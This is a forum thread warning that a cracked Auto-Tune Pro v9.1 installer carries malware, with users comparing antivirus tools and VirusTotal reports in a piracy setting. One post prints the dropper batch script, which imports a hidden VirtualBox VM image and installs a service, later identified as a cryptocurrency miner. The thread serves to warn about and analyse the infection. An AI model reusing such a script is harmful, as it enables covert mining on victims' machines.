Warning new Antares - Auto-tune Pro v9.1 "crack" virus infected

Discussion in 'Software' started by Daskeladden, Sep 29, 2019.

  1. somethin

    somethin Member

    Joined:
    May 8, 2016
    Messages:
    36
    Likes Received:
    11
    He acknowledged the issue and the release will be deleted there too.
     
  2. anonybpro

    anonybpro Newbie

    Joined:
    Aug 29, 2019
    Messages:
    25
    Likes Received:
    0
    i download the infected one, and my bitdefender didnt catch it what should i do know? any help guys please
     
  3. Daskeladden

    Daskeladden Rock Star

    Joined:
    Jan 7, 2018
    Messages:
    986
    Likes Received:
    374
    Windows Defender will find it and take action against it

    The virus/maleware Defender found was:
    Trojan:Win32/DefenseEvasion!BV
     
    • Like Like x 1
    • Agree Agree x 1
    • List
  4. r4e

    r4e Audiosexual

    Joined:
    Sep 6, 2014
    Messages:
    852
    Likes Received:
    1,206
    Damn, would really like to get that file to examine it.
    There also was an infected serum installer around which had a really bad data sniffer on board
    that didn't get detected by any antivirus in the first weeks.

    Maybe it's the same type of virus here.

    Btw. don't use defender, it's total insecure crap. You can modify its settings using a simple batch script
    and allow connections for sending stolen data etc. The simplest antivirus should be able to block such actions
    but defender isn't. I completely removed it from my Windows installation because it just takes space and eats
    cpu while protecting me from nothing serious.

    Btw. I don't get why people always want to use Autotune when there are even better solutions on the market
    like Celemony Melodyne. Autotune is just the one of them that made the therm "autotuning" famous - nothing less
    and nothing more.
     
  5. Gyro Gearloose

    Gyro Gearloose Audiosexual

    Joined:
    Jul 8, 2019
    Messages:
    4,237
    Likes Received:
    1,846
    Location:
    Germany
    senseless AV....but task/process manager would have shown
    how , with the lite OS tool app...?
    interesting , cause on win7 its senseless process runner...always disabled....i mean also when i would use AV i would count just on malwarebytes,kaspersky,zoner etc
     
    Last edited: Oct 1, 2019
  6. KidPix

    KidPix Producer

    Joined:
    Aug 17, 2017
    Messages:
    163
    Likes Received:
    114
  7. prajek

    prajek Member

    Joined:
    Jun 20, 2014
    Messages:
    19
    Likes Received:
    11
    Location:
    NYC
    Hey, I just want to let everyone know that Antares has switched from ILOK to WIBU.
     
    • Agree Agree x 1
    • Interesting Interesting x 1
    • List
  8. r4e

    r4e Audiosexual

    Joined:
    Sep 6, 2014
    Messages:
    852
    Likes Received:
    1,206
    Yes, kind of a tool like NTLite.
    But you also can disable and remove it afterwards with certain tools
     
  9. Gyro Gearloose

    Gyro Gearloose Audiosexual

    Joined:
    Jul 8, 2019
    Messages:
    4,237
    Likes Received:
    1,846
    Location:
    Germany
    has low cpu use from what i kno from reason
    --
    :winker::hillbilly:
     
  10. Daskeladden

    Daskeladden Rock Star

    Joined:
    Jan 7, 2018
    Messages:
    986
    Likes Received:
    374
    Some say it's great and take very little CPU. Defender has improved greatly since it's early period. And like I said it was not Defenders fault that I got the virus. Defender found it but I did not take action cause I thought it was a false positive.
    All other so called "free" antivirus has a lot of pop ups and notification about the premium version. So I guess you pay when you say you use something else. I have not seen any proof that any other antivirus use less CPU than Defender. Also I will not recommend uninstalling Defender it could be asking for trouble on next Windows update (much better to just disable it). I use Windows 10 by the way....
     
    Last edited: Oct 1, 2019
    • Interesting Interesting x 1
    • List
  11. Kwissbeats

    Kwissbeats Audiosexual

    Joined:
    Mar 31, 2014
    Messages:
    1,562
    Likes Received:
    653
    well yeah, like Ilok had no cpu tradeoff before it was cracked
     
  12. anonybpro

    anonybpro Newbie

    Joined:
    Aug 29, 2019
    Messages:
    25
    Likes Received:
    0
    so is there actully a real auto tune 9.1 working crack or it was just a fake all the way?
     
  13. anonybpro

    anonybpro Newbie

    Joined:
    Aug 29, 2019
    Messages:
    25
    Likes Received:
    0
    i dont have windows defender it is disabled, i scanned my pc seems like nothing is infected but how can i be sure?
     
  14. jhagen

    jhagen Platinum Record

    Joined:
    Apr 9, 2013
    Messages:
    461
    Likes Received:
    154
    Why not to stop make shitty trap and let autotune die?
     
  15. Daskeladden

    Daskeladden Rock Star

    Joined:
    Jan 7, 2018
    Messages:
    986
    Likes Received:
    374
    Try and disable bitdefender and enable Defender (do a quick scan) If defender don't find anything I guess you are safe. Where did you download from?
     
    Last edited: Oct 1, 2019
  16. lukehh

    lukehh Audiosexual

    Joined:
    Jun 22, 2012
    Messages:
    1,043
    Likes Received:
    592
    As far as I found out the rutracker version (the version that also was at audioz for a moment) has a miner Trojan in the "Auto-Tune Pro V9.1 [NO ILOK ACTIVATOR].msi" .... But there is also another versoin of it that doesnt contain this virus and also has another checksum and is an exe-file called "Auto-Tune Pro V9.1 [NO ILOK ACTIVATOR].exe". This installs an instance of Oracles VBox on your computer in your programs folder...this folder is hidden and at calls something in another hidden folder named "vms"

    While installing the "Auto-Tune Pro V9.1 [NO ILOK ACTIVATOR].exe"...if you are fast enough you can see in your C:\Users\youUsername\AppData\Local\Temp\ a folder popping up named 5CC5.tmp...Now you have to be fast and make a copy of this folder before it disapears.

    In this folder there's a bat file with this content....I really have no idea what this is doing..is it dangerous or not. Maybe someone else is able to anylyse it. I can send you the link to download the package. I also can send you the 100% infected package from rutracker if you want it.

    --------------------------------------------------------------------------------------------------------------------------------------
    @shift /0
    @echo off

    setlocal EnableExtensions EnableDelayedExpansion

    "c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" setproperty machinefolder "%userprofile%\appdata\roaming"
    "c:\Program Files\Oracle\VirtualBox\vboxmanage.exe" import "c:\vms\tmp\sys00.ova"

    xcopy /Y "C:\Windows\System32\Config\systemprofile\.VirtualBox" "C:\vms\.VirtualBox\"

    "C:\vms\VmServiceControl.exe" -i

    del /F "c:\vms\tmp\sys00.ova"
    ----------------------------------------------------------------------------------------------------------------------------------------
     
    Last edited: Oct 1, 2019
  17. Bunford

    Bunford Audiosexual

    Joined:
    Jan 17, 2012
    Messages:
    2,211
    Likes Received:
    862
    Randomly interrupting, but is there a similar feature to this for Firefox? Since moving from Chrome to Firefox, the translating of pages is the only thing I miss.
     
  18. Roboto

    Roboto Producer

    Joined:
    Sep 9, 2013
    Messages:
    223
    Likes Received:
    89
    ¿Is it "Xfer Serum & Serum FX Update 127b2.rar"? (which got deleted from sister site a few weeks ago)
     
  19. Nightmix

    Nightmix Producer

    Joined:
    Jun 16, 2017
    Messages:
    182
    Likes Received:
    81
    Here's the VirusTotal report of the infected Auto-Tune Pro V9.1 [NO ILOK ACTIVATOR].msi file from rutracker: https://bit.ly/2nENTy7

    (It has not been removed from rutracker as of this post by the way.)
     
  20. Nightmix

    Nightmix Producer

    Joined:
    Jun 16, 2017
    Messages:
    182
    Likes Received:
    81
    Edit - It does in fact appear to be a crypto currency miner.


    Well, it's a batch file and it runs vboxmanage.exe and VmServiceControl.exe, so if those files are on your system, upload them to virustotal and see if it alerts on anything. Keep in mind that it's possible for a rootkit or other virus to install itself in a such a way so that those files will appear to Windows as uninfected, and can even upload to virustotal uninfected versions of the files, even though they are actually infected. (For example, rootkits can create hidden partitions which store the infected "versions" of the files that execute and run on your system, but the versions of those files that appear in your regular file system will read as uninfected. Unless you have specific steps to remove a specific rootkit like that, often the only option is to reformat the drive and restore from the last virus free backup, which you hopefully have.)
     
    Last edited: Oct 3, 2019
Loading...
Similar Threads - Warning Antares Auto Forum Date
Youtube warning regarding adblockers Internet for Musician Dec 3, 2023
Removing noise from live bootlegs (newbie warning) Mixing and Mastering Sep 16, 2023
Audionamix: user data leak warning confirmed Industry News Mar 2, 2023
A Warning On the Future of Music: with Author Ted Gioia | Podcast #1 Education Jun 10, 2022
The best choir sim on the internet? (warning, disturbing images!) humor May 28, 2022
Loading...